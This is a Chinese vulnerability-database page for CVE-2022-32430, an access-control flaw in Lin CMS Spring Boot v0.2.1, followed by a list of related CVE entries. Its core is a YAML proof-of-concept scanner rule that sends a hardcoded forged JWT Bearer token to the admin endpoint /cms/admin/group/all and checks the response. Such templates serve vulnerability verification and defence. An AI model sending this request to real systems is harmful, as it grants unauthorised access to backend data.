CVE-2022-32430: CVE-2022-32430

漏洞描述

PoC代码[已公开]

id: CVE-2022-32430  
 
info:   
  name: CVE-2022-32430
  author: zhizhuo  
  severity: high    
  verified: true  
  description: |-  
    Lin CMS Spring Boot v0.2.1 中的访问控制问题允许攻击者访问应用程序中的后端信息和功能。
  reference: 
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32430
  tags: cve,cve2020
  created: 2023/10/30
 
rules:  
  verify:  
    request:  
      method: GET  
      path: /cms/admin/group/all
      headers:
        Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZGVudGl0eSI6MSwic2NvcGUiOiJsaW4iLCJ0eXBlIjoiYWNjZXNzIiwiZXhwIjoxNzUzMTkzNDc5fQ.SesmAnYN5QaHqSqllCInH0kvsMya5vHA1qPHuwCZ8N8
    expression: response.status == 200 && response.body.bcontains(b'name') && response.body.bcontains(b'id') && response.body.bcontains(b'level') && !response.body.bcontains(b'<html') && !response.body.bcontains(b'<body') && !response.body.bcontains(b'<script')
expression: verify()

相关漏洞推荐

• Webmin /package-updates/update.cgi 命令执行漏洞（CVE-2022-36446） 无POC

  2025-09-05 | Webmin
  Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.997之前的版本存在安全漏洞，该漏洞源于其software/apt-lib.pl组件缺少对U...

• CVE-2022-0342: Zyxel authentication bypass patch analysis POC

  2025-09-01 | Zyxel
  An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versio...

• CVE-2022-0434: WordPress Page Views Count <2.4.15 - SQL Injection POC

  2025-09-01 | WordPress
  WordPress Page Views Count plugin prior to 2.4.15 contains an unauthenticated SQL injection vulnerab...

• CVE-2022-0540: Atlassian Jira - Authentication bypass in Seraph POC

  2025-09-01 | Atlassian Jira
  A vulnerability in Jira Seraph allows a remote, unauthenticated attacker to bypass authentication b...

• CVE-2022-0656: uDraw <3.3.3 - Local File Inclusion POC

  2025-09-01 | uDraw
  uDraw before 3.3.3 does not validate the url parameter in its udraw_convert_url_to_base64 AJAX actio...